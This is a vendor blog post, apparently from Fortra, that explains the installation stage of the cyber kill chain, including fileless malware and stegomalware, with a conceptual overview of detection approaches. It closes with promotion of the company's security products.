What Is Installation in the Cyber Kill Chain?
The installation phase of the cyber kill chain is when attackers install malware onto the victim’s machine in order to maintain their presence there after they’ve gained initial entry. And this is something they’ve worked for from step one.
First, in the reconnaissance stage, the attacker has learned everything there is to know about the target. Then, in the weaponization stage, they’ve crafted their malicious payload of choice, which they distribute to the victim in the delivery stage. This gains them access, which they capitalize on in the next phase, exploitation. Here they take advantage of more vulnerabilities and dive deeper into the network.
At this point, they’re not ready to go home. The installation phase is them trying to keep the good thing they’ve got — access into a victim’s systems — by making themselves difficult to remove. This stage of the attack chain can involve infecting multiple devices, setting up backdoors, and otherwise maintaining persistence in as many covert ways as possible. Next comes command and control (C2) and, ultimately, actions on objectives, so this is a crucial step for attackers.
Common Techniques Used During Installation
In the installation phase of the cyber kill chain, the name of the game (if you’re a black hat) is to install powerful malware that allows you to advance your aim. You’re already in, so how hard could it be? Very hard, if you’re trying not to get caught.
There are two types you can use: malware files and fileless malware. Installing malware directly where it hurts may be effective, but it will also trigger alarms and send the SOC running in your direction. Fileless malware, therefore, is often the weapon of choice as it allows attackers to perform “low and slow” attacks that put them under the radar as they do their dirty work. Leveraging fileless malware is also known as “living off the land.”
These fileless attacks go straight into the memory and are never stored on a file or the machine. By infiltrating benevolent, trusted programs (like PowerShell and Windows script host executables) to initiate malicious processes, the attackers get a head start on security tools that are busy looking for non-whitelisted programs (like malware). These attacks are so hard to catch because most antivirus tools and IDS/IPS stop short of detecting command line changes. By the time those nefarious actions become obvious enough to detect, it is often too late.
How to Detect Attacks at the Installation stage
When it comes to detecting this stage (stage 5 of 7) of the cyber kill chain steps, all is not lost. Sophisticated solutions that can detect indicators of attack (IOAs) are your best bet when it comes to detecting sneaky, embedded actors on your network. Unlike tools that only detect indicators of compromise (IOCs) and malware in its proper form, solutions like extended detection and response (XDR) can spot nefarious alterations and anomalous activity in the act. If there are changes that are being made, powerful AI-driven detection tools can flag them and notify SOCs as soon as they occur.
In addition, investing in things like next-generation antivirus software, SIEMs, and anything that gives you more visibility into the “normal” behavior of your network is always a safe bet. Attackers get away with installation stage activities when their subtle changes to the system go unnoticed. If your SOC knows the baseline behaviors to expect, it can easily detect when something seems amiss.
Future Trends
As things like remote access Trojans (RATs) continue to evolve, we can expect to see new and increasingly evasive tactics like steganography appear more often. Steganographic malware, or stegomalware, is a form of hacker sleight of hand in which attackers “[hide] malicious code within innocuous files like images so that the viewer or scanner only sees what the attacker wants them to see,” as Fortra Lead Solutions Engineer Dr. Steve Jeffery states.
And what do they see? A picture. Stegomalware hides itself in the altered bytes of a pixel or tacks a malicious string of code onto the end of an image file. Sneaky, isn’t it?
Thwarting the Attack Chain at Installation with Fortra
How do you detect things like fileless malware actions, stegomalware, or malware otherwise hiding in plain sight — even if it has evaded detection by your anitvirus solution at the door?
You need AI-powered solutions trained to spot anomalies, not just scan for signatures. Things like Fortra’s capabilities for cloud email protection, extended detection and response, and integrity and compliance monitoring will get you headed in the right direction.
Being able to spot malicious activity at the source, and in its rawest form, is crucial to breaking the cyber kill chain at the installation phase. As this is one of the trickiest stages to detect, nothing less than the best, most advanced tools on the market will do.
Fortra’s cutting-edge solutions come in at every stage of the attack chain; competitors’ solutions often cover just one. Trust Fortra’s real-time indicators of attack and deep, AI-driven detection tools to help you find what other tools just can’t catch.
Want to learn more?
Start at the beginning and master the basics: What Is the Cyber Attack Chain?